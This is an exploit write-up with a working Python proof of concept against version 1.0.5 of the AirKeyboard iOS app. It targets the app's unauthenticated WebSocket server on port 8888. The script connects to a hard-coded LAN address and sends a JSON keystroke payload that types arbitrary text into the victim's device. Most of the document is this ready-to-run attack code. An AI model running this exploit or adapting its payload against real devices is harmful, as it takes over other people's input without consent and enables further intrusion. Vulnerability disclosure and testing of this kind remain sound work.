📄 AirKeyboard iOS App 1.0.5 Remote Input Injection

# Exploit Title: AirKeyboard iOS App Version 1.0.5 - Remote Input Injection
    # Date: 2025-06-13
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://airkeyboardapp.com
    # Software Link: https://apps.apple.com/us/app/air-keyboard/id6463187929
    # Version: Version 1.0.5
    # Tested on: iOS 18.5 with AirKeyboard app
    
    
    '''
    Description:
      The AirKeyboard iOS application exposes a WebSocket server on port 8888
    which accepts arbitrary input injection messages from any client.
      No authentication or pairing process is required. This allows any
    attacker to type arbitrary keystrokes directly into the victim’s iOS device
      in real-time without user interaction, resulting in full remote input
    control.
    '''
    
    import websocket
    import json
    import time
    
    target_ip = "192.168.8.101"
    ws_url = f"ws://{target_ip}:8888"
    text = "i'm hacker i can write on your keyboard :)"
    
    keystroke_payload = {
        "type": 1,
        "text": f"{text}",
        "mode": 0,
        "shiftKey": True,
        "selectionStart": 1,
        "selectionEnd": 1
    }
    
    def send_payload(ws):
        print("[+] Sending remote keystroke...")
        ws.send(json.dumps(keystroke_payload))
        time.sleep(1)
        ws.close()
    
    def on_open(ws):
        send_payload(ws)
    
    def on_error(ws, error):
        print(f"[!] Error: {error}")
    
    def on_close(ws, close_status_code, close_msg):
        print("[*] Connection closed")
    
    def exploit():
        print(f"[+] Connecting to AirKeyboard WebSocket on {target_ip}:8888")
        ws = websocket.WebSocketApp(ws_url,
                                     on_open=on_open,
                                     on_error=on_error,
                                     on_close=on_close)
        ws.run_forever()
    
    if __name__ == "__main__":
        exploit()